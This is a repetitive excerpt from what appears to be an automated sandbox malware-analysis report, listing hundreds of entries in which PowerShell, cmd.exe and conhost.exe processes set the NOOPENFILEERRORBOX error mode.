Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
